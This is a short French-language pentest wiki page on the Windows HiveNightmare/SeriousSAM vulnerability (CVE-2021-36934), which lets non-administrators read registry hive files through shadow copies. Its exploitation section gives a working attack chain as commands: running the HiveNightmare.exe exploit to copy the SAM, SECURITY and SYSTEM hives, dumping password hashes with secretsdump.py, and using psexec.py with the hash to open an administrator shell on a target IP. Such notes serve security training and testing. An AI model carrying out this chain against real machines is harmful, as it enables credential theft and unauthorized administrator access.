🐝HiveNightmare

CVE-2021-36934 également connu sous le nom de vulnérabilité SeriousSAM et HiveNightmare a été découvert par Jonas Lykkegaard en juillet 2021. En raison d'une mauvaise configuration ACL dans Windows 10 post-build 1809 et Windows 11, les utilisateurs non administrateurs bénéficient d'un accès en lecture au trio sacré de Fichiers SAM, SYSTEM et SECURITY sous %windir%\system32\config. Pour que cela soit vrai, cependant, la protection du système doit être activée et un cliché instantané de volume doit être créé. Le nom « HiveNightmare » est dérivé d'un nom commun « hives » qui fait référence aux fichiers contenant des données de registre stockées.

Exploitation

Méthode 1 - Exploit C++

Sur la machine cible, télécharger HiveNightmare.exe dans le répertoire realease du dépôt github suivant:

Exécutez ensuite l'exécutable dans une fenêtre powershell.

>.\HiveNightmare.exe

Cela devrait créer 3 fichiers (SAM, SECURITY et SYSTEM) qu'il sera possible de consulter avec le script secretdump.py comme ceci:

$ python3 secretdump.py -system <SYSTEM file> -security <SECURITY file> -sam <SAM file> local

Il est alors possible d'ouvrir une session administrateur avec le hash de celui-ci:

$ python3 psexec.py -hashes <hash> administrator@<target IP> cmd.exe

Méthode 2 - serioussam.ps1 (exploit Powershell)

Méthode 3 - hive.exe (exploit Go)

Fonctionne de la même manière que l'exploit C++

Dernière mise à jour